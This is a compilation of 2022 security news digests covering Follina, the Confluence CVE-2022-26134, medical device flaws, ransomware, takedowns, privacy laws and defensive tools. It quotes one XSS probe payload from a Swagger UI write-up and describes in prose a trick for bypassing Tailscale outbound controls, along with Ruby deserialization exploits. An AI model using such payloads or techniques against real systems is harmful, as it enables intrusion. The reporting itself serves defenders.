- This vulnerability should still be at the top of the list of things to worry about. You must implement the workaround to prevent exploitation. While anti-malware vendors are quickly updating signatures, they are inadequate to protect against the wide range of exploits that may take advantage of this vulnerability.
- The Microsoft guidance includes a workaround of disabling the MSDT service on each endpoint. Many endpoint protection tools are also now able to detect and block the attack, check to see if you’re covered there. Additionally verify your email security services are enabled, and are detecting and blocking this attack. While blocking externally sourced office documents is also an approach, use caution as this is likely impactful to the business and likely will be worked around by users.
- Just a reminder that SANS had a webinar on Follina you can view at https://www.sans.org/webcasts/emergency-webcast-msdt-ms-word-0-day/ and published a Follina Q&A with SANS instructor Jake Williams at https://www.sans.org/blog/follina-msdt-zero-day-q-a/
Read more in
- An Actively Exploited Microsoft Zero-Day Flaw Still Has No Patch
- Microsoft won’t say if it will patch critical Windows vulnerability under exploit
Follina is Being Actively Exploited
Threat actors believed to be acting on behalf of an as-yet unidentified government have been exploiting the Follina vulnerability to target US and European government organizations. The threat actors sent at least 1,000 phishing messages that contained a maliciously-crafted document that pretended to be information about a salary increase.
- One set of Follina exploits sighted is taking advantage of a digital signature that was created using a key stolen from software company Clickstudio. More sophisticated exploits like this will often bypass defenses.
- Make sure your shields are up, IOCs in place and you’ve implemented your plan to mitigate the risks of a Follina attack.
Read more in
Audit Raises Questions About Federal Dam Cybersecurity Accountability
The Tennessee Valley Authority (TVA) Office of Inspector General’s audit of the TVA’s non-power dam control system cybersecurity “found no clear ownership of the non-power dam control system; vulnerable versions of operating systems and control system software; inappropriate logical and physical access; [and] internal information technology controls [that] were not operating effectively or had not been designed and implemented.”
- The deficiencies are mostly basic security hygiene issues – Implementation Group 1 of the Critical Security Controls. Most of IG1 are really related to shortcomings in IT (or in this case OT) operations and governance – updating applications and operating systems to current versions, having clear business ownership of systems, etc. The TVA has said it will remedy deficiencies by May 2023 but the OT operations and governance issues should be addressed ASAP.
- This is foundational cyber hygiene. Make sure that you have a comprehensive inventory of systems and that ownership, particularly of the security, is well defined. Then make sure that you are verifying the security posture, remediating gaps when discovered. Verify you have policies and procedures to support systems being deployed as securely as possible with open lines of communication on not only how to approach that, but also how to remediate discovered issues without throwing anyone under the bus.
Read more in
- Accountability unclear as cybersecurity for federal dams falls short
- Request for Final Action – Audit 2022-17340 – Non-Power Dam Control System Cybersecurity (PDF)
Windows Autopatch Now in Preview
Microsoft has made its Windows Autopatch service available for public preview. The service will be generally available in July to customers with Windows Enterprise/Microsoft 365 E3 or E5 licenses.
- Per earlier NewsBites comments on Windows Autopatch, if you have the right licenses, try it out across a controlled test environment. The security gain is a given and application issues due to the patches are very likely to be less than you anticipate.
- Reducing the workload of keeping endpoints updated is a big win. This service is designed to work with enterprise devices, without necessitating a VPN connection. Note the prerequisites which include device management via Intune or Configuration Manager co-management, user accounts in Azure Active Directory or Hybrid Azure Active Directory Join. You may already meet these requirements for your enterprise systems.
- This should be enabled by default across all enterprises and systems. Fear of breaking applications is overstated. The risk of unpatched systems is a demonstrable problem.
Read more in
- Get started with Windows Autopatch: public preview
- Microsoft’s new ‘autopatch’ service for Windows PC just took another step forwards
- Microsoft: Windows Autopatch now available for public preview
Atlassian Releases Patches for Critical Confluence Server and Data Center Vulnerability
Atlassian has released fixed to address a vulnerability affecting its Confluence Server and Data Center. The flaw can be exploited by an unauthenticated user to execute arbitrary code. The issue affects all supported versions of Confluence Server and Data Center; the updated versions are 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, and 7.18.1. Customers who access their Confluence sites through an Atlassian.net domain are not affected.
- The flaw dates to Confluence Server and Data Center products version 1.3.0. The long-term fix, if you’re continuing to host your Atlassian instance, is to update to the latest long term support release. If you’re in a cluster, make sure that you don’t forget to update all the nodes. Atlassian is pushing customers towards a hosted solution; after you apply the updates, this would be a good time to have those conversations, to include recording any show-stoppers to avoid re-hashing known issues.
Read more in
- Confluence Security Advisory 2022-06-02
- Atlassian Issues Patch for Critical Confluence Zero-Day
- Atlassian patches zero-day affecting Confluence Data Center and Server
US Draft Legislation Would Create National Data Privacy and Security Framework
US legislators on both the House of Representatives and the Senate have released a discussion draft of legislation described as “a comprehensive national data privacy and data security framework.” The draft bill would designate the Federal Trade Commission (FTC) as regulator for the proposed rules, which would pre-empt most state data privacy and security laws.
- The US Congress has failed to pass federal data privacy laws many times over the past 15 years, so hard to be optimistic that this will actually pass, but some of the thornier issuers (like the preemption issue) have been addressed in this draft. The FTC has a good track record in this area – SANS gave the agency a Difference Makers award back in 2013. If the law passes, the FTC will have a year to establish the new office and define squishy terms such as “reasonably necessary, proportionate, and limited…” The draft also attempts to address social media algorithms, a controversial area.
- One hopes this time we get something enacted. Getting a common bar at the federal level should help raise the bar across the nation. One thing to keep an eye on is which state laws are preserved/not preempted. Generally, state laws to be preserved include consumer protection, civil rights, student and employee privacy, data breach notification, contract and tort, fraud, theft and identity theft, unauthorized access to electronic devices, and unauthorized use of personal information, cyber stalking, cyber bullying, sexual harassment, etc.
Read more in
- New Data Privacy Draft Puts FTC in Driver’s Set, Preempts State Laws
- House and Senate Leaders Release Bipartisan Discussion Draft of Comprehensive Data Privacy Bill
New York’s Right to Repair Bill for Electronics
The New York State legislature has passed an electronics right-to-repair bill. The Fair Repair Act. The bill would require electronics makers to share diagnostic and repair information with consumers and independent repair shops and make software, tools, and part available to them. The governor has not yet signed the bill into law.
- This is a big step forward for local electronics repair shops in New York State, and offers hope for less expensive repair options, rather than wholesale replacement of damaged electronic devices. Once signed into law, there will be a year for implementation. Note the bill applies only to electronics; medical devices, home appliances, agricultural and off-road equipment, public safety communication equipment or motor vehicles are not subject to the bill.
- Note that for most enterprises, repairing mobile devices yourself will be significantly more expensive than even what Apple charges, but this may help drive repair prices down in the long run.
Read more in
- New York state passes first electronics right-to-repair bill
- New York state passes first-ever ‘right to repair’ law for electronics
Security Flaws in BD Synapsis, BD Pyxis, and Illumina Medical Devices
The US Cybersecurity and Infrastructure Security Agency (CISA) and the Food and Drug Administration (FDA) have warned of security vulnerabilities in several medical devices. Flaws in BD Pyxis automated medication dispensing systems could be exploited to gain access to protected health information (PHI). A vulnerability in the BD Synapsis microbiology informatics software platform could be exploited to modify data, which could result in incorrect or delayed treatment. A handful of vulnerabilities in Illumina in-vitro diagnostic devices and research use only instruments could be exploited to take control of unpatched devices.
Illumina has released a patch that protects against remote exploitation as a stopgap until the permanent fix can be released, BD is releasing Synapsis v4.20 SR2 later this month to address the weakness. BD Pyxis is working to remove hard coded credentials and is piloting a credential management solution as a long-term fix. In the interim, you’re going to want to make sure the devices are properly segmented only allowing connections for authorized devices and users.
Read more in
- CISA Warns of Medical Device Security Vulnerabilities in BD Synapsys, Pyxis Devices
- Feds Issue Alerts for Several Medical Device Security Flaws
- FDA Urges Healthcare to Patch Severe Illumina Cybersecurity Vulnerabilities
- FDA: Patch Illumina DNA Sequencing Instruments, Stat
- FDA urges patch of Illumina devices with three critical flaws ranked 10 in severity
- ICS Advisory (ICSA-22-153-02) Illumina Local Run Manager
- ICS Medical Advisory (ICSMA-22-151-01) BD Pyxis
- ICS Medical Advisory (ICSMA-22-151-02) BD Synapsys
Palermo, Italy Suffers Cyberattack
Computer systems belonging to the city of Palermo, Italy were targeted in a cyberattack late last week. Palermo has a population of 1.3 million and is also a popular destination for tourists. As of Monday morning (June 6), all public services, websites, and portals are offline.
- Details are sparse, actions taken align with a ransomware versus DDoS attack. Some services are operating with fax rather than digital communication mechanisms. The city has engaged an IT service restoration company, SISPI, which is also helping to coordinate updates as well as service restoration.
Read more in
Avast published a report last week on an email spear-phishing campaign that hit an Australian ISP and which weaponized the Follina Office zero-day (CVE-2022-30190). Microsoft linked this campaign to the GADOLINIUM (APT40) group.
Google GCP VRP
Google has announced the winners of its Google Cloud Platform Vulnerability Research Program for 2021. The first-place prize ($133,337) went to Sebastian Lutz, who found a bug in Identity-Aware Proxy (IAP) that an attacker could have exploited to gain access to a user’s IAP-protected resources by making them visit an attacker-controlled URL and stealing their IAP authentication token.
NCC Group researchers have published a technical analysis of CVE-2022-30790 and CVE-2022-30552, two vulnerabilities in U-Boot, a boot loader popular in some Linux-based embedded systems such as ChromeOS and Android devices.
CodeSec is now free
France’s ANSSI cybersecurity agency has open-sourced another tool for the security community. The tool is called AnoMark and can be used to detect anomalies in command-line arguments run on a system.
Microsoft disrupts Bohrium APT infrastructure
Microsoft’s Digital Crimes Unit (DCU) said on Friday that they disrupted infrastructure operated by Bohrium, a cyber-espionage group operating out of Iran.
Amy Hogan-Burney, DCU General Manager, said the DCU legal team successfully obtained a court order that granted Microsoft control over 41 domains used by the Bohrium group in spear-phishing operations.
“Our DCU investigation found Bohrium targeted customers in the US, Middle East, and India. Targets come from sectors including tech, transportation, government, and education,” Hogan-Burney said.
The Microsoft exec said the group’s members used fake social media profiles, often posing as recruiters, and lured employees at targeted organizations on one of the 41 malicious sites. Here, they tried to collect their personal information, which they later used in subsequent email attacks that sought to infect the victims with malware.
To date, Microsoft’s DCU team has used the US court system to seize domains and server infrastructure from more than two-dozen cybercrime and espionage groups alike.
The court filings can be found here.
Ukrainian TV station hack
Russian hackers have breached the systems of Ukrainian TV station OLL and have broadcast Russian propaganda during the Wales-Ukraine soccer match that decided which of the two teams will attend the World Cup later this year. OLL TV confirmed the incident in a Facebook post, took down its feed, and live-streamed the game on its YouTube channel. (via @cyber_etc)
The apes are gone, again
A threat actor stole 32 NFTs from the Bored Ape Yacht Club collection after they managed to compromise the Discord account of one of its community managers. The threat actor used this compromised account to share a phishing link through which they gained access to BAYC owners’ cryptocurrency wallets. From there, they misappropriated the NFTs and also allegedly stole an additional $145,000 worth of Ether. This is the second hack of BAYC NFTs over the past two months after hackers also stole 54 Bored Ape NFTs valued at more than $13.7 million in April.
Google privacy settlement
Illinois residents are eligible to receive part of a $100 million settlement after an Illinois judge found that Google broke the state’s Biometric Information Privacy Act after the tech giant used a face regrouping tool in the Google Photos app without users’ express permission. Claims can be submitted here.
Telegram privacy accusations
De Spiegel reported last week that instant messaging service Telegram shared the data of some of its users with the German Federal Criminal Police Office (BKA). The report is the first known instance where Telegram has collaborated with the BKA. The German newspaper said the cooperation was related to cases of child abuse and terrorism.
WhatsApp threatens to leave the Netherlands
Facebook has threatened to pull its WhatsApp service from the Netherlands if the local government continues with its plan to force the company to add a backdoor to its service, local media reported.
Microsoft Edge network service sandbox
Microsoft’s Edge web browser now ships with a separate sandbox system for the browser’s network component. The feature shipped with Edge v102 but is disabled by default while its performance is still being tested. The feature previously shipped with Chrome in April, in v100, where it caused some issues in its initial rollout.
New Firefox privacy feature
Mozilla plans to add a new privacy feature to Firefox v102, set to be released later this month. The new feature is named “Query Parameter Stripping,” and works by automatically removing tracking parameters from URLs to improve user privacy. The feature has been available since Firefox v96 but will be enabled by default for all users in the next v102 release. The Brave browser also has a similar feature.
1Password joins FIDO
The 1Password software company, maker of the eponymous password management utility, has formally joined the FIDO Alliance, the industry group behind the new WebAuthn standard.
Russia gets tough on privacy
The Russian Ministry of Digital Development is working on a new legislation draft that will make tech company execs personally liable for the improper collection and storage of the biometric data of Russian citizens. According to Kommersant, Execs risk fines of up to 300,000 rubles, a ban from holding certain positions, forced labor, and even up to 10 years in prison. The draft legislation comes after last month, in May, Russia also made execs personally liable for their companies’ lacking IT security, with similar prison sentences on the table for severe security breaches.
Australia’s new cyber minister
Australia now has a dedicated minister for cyber security after Australia’s new Prime Minister Anthony Albanese appointed Clare O’Neil as the Minister for Home Affairs and Minister for Cyber Security last week.
CloudSEK has published a report on the timeline and evolution of Eternity, a financially motivated threat actor group selling worms, stealers, DDoS tools, and ransomware builders.
According to DataBreaches.net, the Pysa ransomware gang dumped the data of more than half-of-dozen schools last year before the group shut down their leak site.
Windows RDP brute-forcing
A recent report from TRUNC found that 75% of the RDP brute-force attacks the company registered over the past week tried to gain access to their system via the “Administrator” account.
Bot detection and mitigation service Kasada said that it detected a 750% rise in the use of “solver services” to bypass existing bot detection systems. These solver services are typically maintained by cybercrime groups and provided as a paid service to other groups that want to engage in fraud against an online service, such as online retail stores, social networks, and others.
Banks in Singapore Must Take Steps to Protect Customers from Online Fraud
Banks in Singapore are being required to take steps to help protect customers from online fraud. The new measures require that the banks provide customers with a kill switch that lets them suspend their accounts in the event of a breach. They also have to improve their fraud surveillance systems. Customers are being urged to use mobile banking aps instead of visiting bank sites in browsers.
- Many of the steps required earlier are remedial measures to get up to common practice levels of fraud reduction. The self-service kill switch in place of a phone call seems likely to have unintended consequences of driving calls up when hit accidentally. The move to more use of mobile banking apps reinforces the importance of the mobile telecom service providers and cell phone vendors stepping up the pace of pushing out security updates to all devices, and for Apple and Google to reduce the quantity of fraudulent or “leaky” apps that make it into the Apple App Store and Google Play.
- This is an interesting option, there will be some user training as all parties also learn when not to use this feature. Too often legitimate transactions are mistaken for fraud when the supporting details are inaccurate or truncated, such as POS systems still including test or outdated information in their name. Note the user is expected to call the help desk or use an ATM to initiate the lock. Increased functionality in mobile applications is welcome, don’t overlook weaknesses in the web interface, APIs or other entry points needed to support online users. Make sure users can equally access supporting details for transactions from all provided entry points.
Read more in
Atlassian Warns of Confluence Server Vulnerability
Atlassian has released an advisory warning of a critical unauthenticated remote code execution vulnerability in its Confluence Server and Data Center. The flaw, which affects all currently supported versions of Confluence Server and Confluence Data Center, is being actively exploited. There are currently no fixes available for the vulnerability. Atlassian Cloud sites are not affected.
- This vulnerability was found after it was used in an attack against two different companies. So far, there is no patch for this vulnerability. Do not expose your Confluence server to the public. If you find a server exposed: Take it out back and rm -rf it.
- The advisory notes that all supported versions of Confluence are affected, and hints that unsupported versions are as well. Don’t take a chance, implement the mitigations on all instances of Confluence. Apply the update when released and update unsupported versions or migrate to the Atlassian Cloud service. The mitigations are to either restrict access from the Internet or shutdown your instances. The CISA bulletin on CVE-2022-26134 recommends blocking Internet access. Make sure that you are monitoring activity for malfeasance. www.cisa.gov: Atlassian Releases Security Advisory for Confluence Server and Data Center, CVE-2022-26134
Read more in
- Confluence Security Advisory 2022-06-02
- Atlassian: Unpatched critical flaw under attack right now to hijack Confluence
- Critical Atlassian Confluence zero-day actively used in attacks
FBI Blocked Cyberattack Against Boston Children’s Hospital
In a speech at Boston College earlier this week, FBI Director Christopher Wray said that his agency helped to thwart a cyberattack that was targeting Boston Children’s Hospital in 2021. The FBI learned of the impending attack from an intelligence partner.
- All too often notification to law enforcement is the first indication to organizations that they have already been compromised. Good to see the FBI taking timely action to aid in prevention of damage.
- Chalk one up for the good guys. The hospital was able to partner with the FBI and take needed steps to stop the attack. This information triggered the production of subsequent advisories on both healthcare and critical infrastructure protection. Make sure that you have relationships with the FBI, CISA and/or relevant ISOC partners before you need them to facilitate a timely response. Ensure you aren’t overlooking key component security on devices labelled as appliances which silently “just work.”
Read more in
- FBI Blocked Iranian-Backed Cyberattack on Boston Children’s Hospital Last Year.
- FBI thwarted cyberattack against Boston Children’s Hospital
- FBI: Hospital Averted ‘Despicable’ Iranian Cyberattack
VPN Company Will Move Servers Out of India
ExpressVPN says it will move its servers out of India due to new rules recently introduced by India’s Computer Emergency Response Team (CERT-In). ExpressVPN says it cannot comply with the rule’s requirement to retain customers’ names and activity because it does not retain logs of users’ activity. The company also describes the new rule as “incompatible with the purpose of VPNs.”
- This implies that any VPN company still operating in India will comply with data retention laws.
- Keep an eye to regulations for the regions and countries where you operate services. Not all regulators are willing to accept a response of not technically feasible. Or you may wind up in a perpetual cycle of explaining the impossibility of compliance. Either way, removing operation from that area may be the best overall solution; don’t make that decision in a vacuum, make sure the C-Suite and board are behind you.
Read more in
- Rejecting data demands, ExpressVPN removes VPN servers in India
- ExpressVPN moves servers out of India to escape customer data retention law
Law enforcement agents from 11 countries have taken down the infrastructure that was supporting the FluBot malware. FluBot has been infecting Android devices since December 2020. The malware disables security features and steals banking app credentials and cryptocurrency account information. FluBot can spread quickly because it accesses contact lists of infected devices.
- The contact list in mobile devices has become a lifeblood for maintaining connections with our friends, partners, and businesses, synchronization with desktop tools for consistency is now SOP. As such attention should be paid as to what has been granted access to your contacts. Look at application permissions, particularly mobile apps, restricting them to the minimum set. Check for applications you don’t use any longer and remove them. Resist the temptation to install a new app to view a unique content type. Make sure that content type is legitimate long-term, and not a lure.
Read more in
- International Authorities Take Down Flubot Malware Network
- Takedown of SMS-based FluBot spyware infecting Android phones
Foxconn Plant Hit with Ransomware
Electronics manufacturer Foxconn disclosed that one of its production facilities in Mexico was the target of a ransomware attack in late May. The affected plant in Tijuana is “gradually returning to normal,” according to a Foxconn spokesperson.
- The LockBit ransomware group is taking credit for the attack and threatening to publish the exfiltrated information on June 11th. It is expected that the demand is a substantial as LockBit only targets large businesses with the ability to pay large ransom demands. Foxconn manufactures electronics, LCD TVs, mobile devices, computers for many brands, so there is a risk of substantial IP disclosure. This creates an interesting dilemma as you’re dealing with disclosure of customer data, not just yours. Consider the actions you would need in this scenario, not just to prevent recurrence, or redistribute workload to meet customer demand, but also to retain their business.
Read more in
US Dept. of Justice Seizes Domain Names Used for Cybercrime
Earlier this week, the US Department of Justice (DoJ) seized three domain names that were being used to sell stolen personal information and provide distributed denial-of-service (DDoS) attacks for hire. The WeLeakInfo site claimed to be offering about 7 billion stolen records that contained personally identifiable information (PII).
- In 2020, the WeLeakInfocom domain was seized, and two suspects were arrested in Ireland and Netherlands. This action seized the WeLeakInfoto, ipstressin and ovh-bootercom domains. The latter two provided booster or stressor services used for a DDoS attack. The FBI is still seeking information on any individuals connected with any of these domains.
Read more in
- WeLeakInfo.to and Related Domain Names Seized
- FBI seizes domains used to sell stolen data, DDoS services
- Authorities seize domain names after probe into sales of stolen personal information
Nakasone: US Conducted Offensive Cyber Ops
General Paul Nakasone, Director of US Cyber Command, said that the US has ”conducted a series of operations across the full spectrum: offensive, defensive, [and] information operations.” Nakasone also said that his agency conducted a “hunt forward” cyber operation in Ukraine shortly before the Russian invasion.
- Use extreme caution with offensive cyber operations. Not only can you become a target if discovered, but you also put affiliated parties at risk. Understand the value and purpose of disclosing these activities. It’s safer to learn from the ongoing battle between Russian threat actors and the Ukraine; applying lessons learned to your area than to actively participate, even though that participation is alluring.
Read more in
- Cyber Command chief confirms US took part in offensive cyber operations
- US Confirms It Has Provided Cybersecurity Support to Ukraine
CISA Says Dominion Voting Machine Flaws Were Not Exploited
The US Cybersecurity and Infrastructure Security Agency (CISA) says that while several vulnerabilities were found in Dominion Voting Systems machines, there is no evidence that the flaws were ever exploited. CISA has notified election officials in states that use the equipment and has provided mitigations.
- The key quote is “Of note, states’ standard election security procedures would detect exploitation of these vulnerabilities and in many cases would prevent attempts entirely.” So, the key is making sure that standard election security procedures are being followed by the large and small government election authorities and that vulnerabilities in processes are being remediated before any exploitation attempt.
- A lot of success can be attributed to defense-in-depth of the procedures, cyber, physical, and operational, supporting the voting process. If you’re a steward of electronic voting machines, make sure that you’re applying updates whenever they are released, not waiting until the last minute because they’re all in storage.
Read more in
- CISA Finds Vulnerabilities in Dominion Voting Machines, No Exploitation
- No evidence of exploitation of Dominion voting machine flaws, CISA finds
Apple App Store stats
Apple published a report on Wednesday summarizing its work in protecting the App Store. The company said that its safety systems blocked more than $1.5 billion in potentially fraudulent transactions, preventing the attempted theft of user funds, and also blocked more than 1.6 million risky and vulnerable apps and app updates. More stats are in the image below.
Back in April, Microsoft teased a new product called Autopatch that could be used to automatically install updates on large fleets of PCs. A first public preview of this upcoming service has been released this week. The service will be offered to Windows 10/11 Enterprise E3 customers in July this year.
Mozilla has released Firefox 101. Patch to fix a bunch of security bugs.
Some Mozilla VPN code goes FOSS
Mozilla has open-sourced this week the source code of its affiliate marketing component that is used to promote its Mozilla VPN service. Mozilla said the “affiliate marketing is a space rife with tons of data collection practices” and they wanted to be transparent about their system and what it collects from new users landing on its service.
ExpressVPN pulls out of India
ExpressVPN, one of the largest VPN providers in the world, has announced that it will pull servers from India after the local government passed a new cybersecurity law that would have mandated the company to collect and store information on all its users.
Voice privacy nightmare
Wired has an excellent report on the future troubles everyone is going to have with (re)securing their voices if voice biometrics and deep fake technology see broader adoption, especially after so many of us have uploaded our voice recordings on social media or have used tools based on voice recognition, such as Alexa or other smart assistants.
Law enforcement agencies from 11 countries have disrupted the operations of the FluBot Android malware gang, Europol announced on Wednesday. The malware, first spotted in December 2020, had built a reputation in recent months for carrying out large-scale SMS spam campaigns that redirected users to malicious sites hosting malicious Android apps infected with its trojan. Once it infected a new smartphone, it would use the contacts list to spread to send out new spam messages.
The US Department of Justice seized on Wednesday three domains that hosted cybercrime services. Together with Dutch and Belgium police, officials seized ipstress.in and ovh-booter.com, the domains of two DDoS-for-hire services, and weleakinfo.to, a domain used to advertise and sell access to more than 10,000 hacked databases. This last domain was, in fact, a clone of an older service hosted at weleakinfo.com that the DOJ seized back in 2020.
Elasticsearch ransom attacks
Cybersecurity firm Secureworks said that it detected a new wave of ransom attacks targeting Elasticsearch servers that have been left unsecured online. The attackers are demanding a ransom of $620 (paid in Bitcoin) to restore deleted files, and Secureworks said it found this particular ransom note on around 1,200 Elasticsearch databases so far.
Malicious npm package
ReversingLabs said it identified a malicious npm package that would install a cryptocurrency miner on infected systems. The package, named maintainancewebsite, has been removed in the meantime.
EvilCorp evading sanctions
Mandiant said in a report published on Thursday that the EvilCorp cybercrime cartel, which previously operated the Locky, Hades, and the BitPaymer ransomware strains, is now using the LockBit ransomware in recent intrusions. Mandiant said the group has stopped operating its own ransomware strains after sanctions from the US Treasury have made it impossible to receive ransom payments. By using ransomware developed by other gangs, Mandiant said EvilCorp may be trying to avoid US sanctions.
Faking malicious traffic
An unidentified entity has created malware samples that have the Xinjiang Police Files leak site (xinjiangpolicefiles.org) as the command-and-control domain in the hopes of getting the site blacklisted in web browsers.
The Broadcom Symantec security team has published a report on Clipminer, a malware strain that the company said has made at least $1.7 million worth of cryptocurrency for its operators. Symantec sais the trojan installed crypto-mining software on infected devices and hijacked transactions by replacing legitimate cryptocurrency addresses inside the infected computer’s clipboard. The malware was first spotted in January 2021, and its operators have used game and pirated software cracks, P2P networks, torrent indexers, or YouTube videos to spread it to victims.
Avast published a technical report on Wednesday on SMSFactory, a new Android malware strain. SMSFactory spreads via malvertising campaigns, and once it infects victims, it generates money for its operators by sending premium SMS and making calls to premium-rate phone numbers from compromised devices.
Trend Micro’s threat research team published a report on Thursday on YourCyanide, a new ransomware strain targeting Windows systems that relies on the CMD utility to spread and encrypt a victim’s files.
Cado Security has an update on the recent TTPs used by the TeamTNT crypto-mining botnet. Per the company, the group’s recent antics have targeted Docker Engine API endpoints and Redis servers.
Conti goes after Intel firmware
The Eclypsium team has published a report on the Conti’s gang use of Intel firmware vulnerabilities in their attacks, based on the gang’s recently leaked internal chat logs.
Palo Alto Networks has published a report on a new malware strain called Popping Eagle. The malware is written in Go and is used as a late-stage backdoor in targeted attacks.
Kaspersky has published a report on LuoYu, a Chinese APT, and its use of a new malware strain named WinDealer. The Russian security firm said LuoYu carried out rare man-on-the-side attacks, where it tried to respond to a victim’s network traffic with trojanized application updates before the legitimate ISP could complete the request. These malicious app updates contained the WinDealer malware, which the attackers used as a backdoor on infected systems to search and exfiltrate sensitive data. Kaspersky said the vast majority of LuoYu victims were located in China.
Group-IB researchers have discovered a new malicious infrastructure and a custom tool of the APT group SideWinder (aka Rattlesnake, Hardcore Nationalist, RAZOR TIGER, T-APT-04, and APT-C-17), a threat actor that is believed to be originating from India and primarily targeting Pakistan. The newly discovered custom tool codenamed SideWinder.AntiBot.Script, is being used in the gang’s phishing attack against Pakistani targets.
Chinese APTs and cybercrime
Recorded Future has published a report summarizing the different incidents where Chinese state-sponsored hacking groups have dabbled in cybercrime targeting neighboring countries. This includes cryptocurrency theft, romance scams, and the theft and trade of PII data.
Backdoor stays in
Following a two-year-long vulnerability disclosure process, Korenix refused to remove a backdoor account from its JetPort serial devices. The vendor told SEC-Consult—the security that found the hardcoded backdoor account—that they “will not remove the hardcoded backdoor account as it is needed for customer support and it can’t be cracked in a reasonable amount of time.”
Atlassian said that threat actors are using a new zero-day vulnerability (CVE-2022-26134) to compromise on-premises Confluence servers. The zero-day is an unauthenticated, remote code execution vulnerability in Confluence Server and Data Center systems. There is no patch at the time of writing. Security firm Volexity first identified the attacks, which it said were being used to install JSP web shells on the affected servers, and then a malicious server implant called BEHINDER.
New MSFT zero-day, same core problem
British security researcher Matthew Hickey said he found another zero-day vulnerability in the Office software suite where malicious documents can automatically open a Windows Search window containing remotely-hosted malware executables. The yet-to-be-formally-confirmed zero-day is in the same tune as this Positive Technologies reported bug and the recent Follina (CVE-2022-30190) issue, where attackers are abusing various Office protocol handlers to connect to remote sites and download and run malicious content. In this case, it was the Microsoft Office search-ms: URI handler, while the previous vulnerabilities abused the ms-officecmd: and ms-msdt: handlers.
Sophos security researcher Hardik Shah published a technical analysis of CVE-2022-0778, a denial of service vulnerability in the OpenSSL library. The vulnerability can be used to trigger an infinite loop by crafting a certificate that has invalid elliptic curve parameters. Because certificate parsing happens before verification of the certificate signature, any process that parses an externally supplied certificate may be subject to a denial of service attack if they don’t use a patched version of the OpenSSL library.
Check Point said it found vulnerabilities in UNISOC baseband chips that open modern smartphones to remote attacks. UNISOC is the fourth largest baseband chipset maker after MediaTek, Qualcomm, and Apple, and is widely used in low-cost Android devices sold across Africa and Asia.
Unpatched Horde webmail bug
Security firm SonarSource published a report this week detailing a vulnerability (CVE-2022-30287) in the Horde webmail application that can allow an authenticated Horde user to execute arbitrary code on the underlying server. The company said that the Horde team patched another bug but passed it as a fix for this issue, meaning the vulnerability remains unpatched.
Cyber security firm ReliaQuest announced on Wednesday that it plans to acquire threat intelligence firm Digital Shadows for $160 million.
Security firm XM Cyber has released a tool called VmwarePasswordDecryptor that can recover and decrypt passwords stored on a local PC and which are used to connect to remote VMWare systems such as ESXi, vSphere, and Workstation.
Amnesty has announced a Digital Forensics Fellowship for anyone interested in helping secure human rights activists and investigate attacks against civil societies across the world. Five positions are available.
FBI thwarts Iranian attack
FBI Director Christopher Wray said that the FBI Boston office blocked a cyberattack orchestrated by Iranian hackers against the Boston Children’s Hospital last year.
shot-scraper: automated screenshots for documentation, built on Playwright: A CLI tool for automating screenshots of web pages, by Simon Willison. You can also have it screenshot just a subsection of the page using CSS selectors.
Web scraping with Python open knowledge: Re Analytics shares best practices for scalable and efficient to maintain web scraping in Python. See also advanced-scrapy-proxies, a Scrapy rotation proxy package with advanced functions.
Azure/aztfy: A tool to bring existing Azure resources under Terraform’s management.
google/cloud-forensics-utils: A Python library to carry out DFIR analysis on the cloud. Currently supports GCP, Azure, and AWS.
How to Think about Threat Detection in the Cloud: Google’s Anton Chuvakin and Tim Peacock share their views on a foundational framework for thinking about threat detection in public cloud computing.
How to use Atomic Red Team to test Falco rules in K8s: It’s important to test that your security controls and tools actually work! Sysdig’s Jason Avery describes how to use Red Canary’s Atomic Red Team in a Kubernetes environment to confirm that Falco’s rules flag the malicious behavior.
google/santa: A binary authorization system for macOS.
Avoiding Security Alert Hell: Introducing Squyre: Bill Mahony announces Squyre, a new open source tool aimed at reducing analyst fatigue by automatically enriching alerts with helpful context. It uses Lambdas and Step Functions to extract IP addresses, domains, hashes etc. from an alert body, looks them up on various services, and then adds the results to the alert in your ticketing system (e.g. Jira).
Software Supply-Chain Security Reading List: A list of resources by Chainguard covering policy, incidents/threats, solutions, organizations, background, and reports and summaries.
Running Bug Bounty Programs
Eight years of the GitHub Security Bug Bounty program: By GitHub’s Jill Moné-Corallo. GitHub awarded $803,769 in bounties for 235 vulnerabilities in 2021, bringing them to ~$2.4M in total rewards via HackerOne since 2016. Npm has also been added to GitHub’s bug bounty scope.
From Hacker to Bug Bounty Program Owner: A Learning Experience: Braze’s Tommy DeVoss describes the lessons he’s learned in going from a top bug bounty researcher to building Braze’s program. Four big learnings:
- Launching a Bug Bounty Program Takes Cross-Team Collaboration
- Never Lose Sight of Your Relationship With Hackers and Researchers
- Bug Bounties Look Different From the Company Side
- The Work Doesn’t End When a Bug is Identified
cisagov/Malcolm: A powerful, easily deployable network traffic analysis tool suite for full packet capture artifacts (PCAP files) and Zeek logs, by CISA.
A few Tailscale tricks for Security Testers: Pulse Security NZ’s Michael Fincham shares some interesting details about how Tailscale works, including that Tailscale currently only supports ingress access control rules, all outbound network traffic leaving a host is allowed. So if you’ve compromised a machine, you could re-install a modified version of Tailscale to allow any traffic to the device. Also:
As a tailnet administrator you still have to make sure your containers are running with tags rather than a human user if you want to avoid containers being able to leak each other’s environment variables.
See also Tailscale’s Hardening Guide. I feel like I’ve been hearing a lot of good things about Tailscale recently, I’ve been meaning to play with it when I have time.
Hacking Swagger-UI – from XSS to account takeovers: Vidoc Security Lab’s Dawid Moczadło found a DOM XSS in Swagger UI, which he was able to successfully report across 60 different bug bounty programs. Swagger UI had an outdated version of DomPurify, and Dawid found a new way to exploit a known DomPurify bypass.
I think this post is a good example of finding and building on related work to achieve a goal, and maximizing impact.
GitLab had CSP that did not allow me to use event handlers –
<img onerror=alert(window.origin) src=1>was blocked. The good thing with Gitlab is that they disclose all of their security issues, so I just searched for XSS and copied the CSP bypass from there;) (remember to work smart not hard)
Ruby Vulnerabilities: Exploiting Dangerous Open, Send and Deserialization Operations: Bishop Fox’s Ben Lincoln walks through a number of ways to get sweet, sweet remote code execution when testing Rails apps, as well as a sample vulnerable app and example exploit code. Vulnerabilities: Kernel-level open function, insecure send, binary deserialization, YAML deserialization, and Oj JSON Deserialization.
“Follina” exploit in Microsoft Office gives attackers potential backdoor to code execution
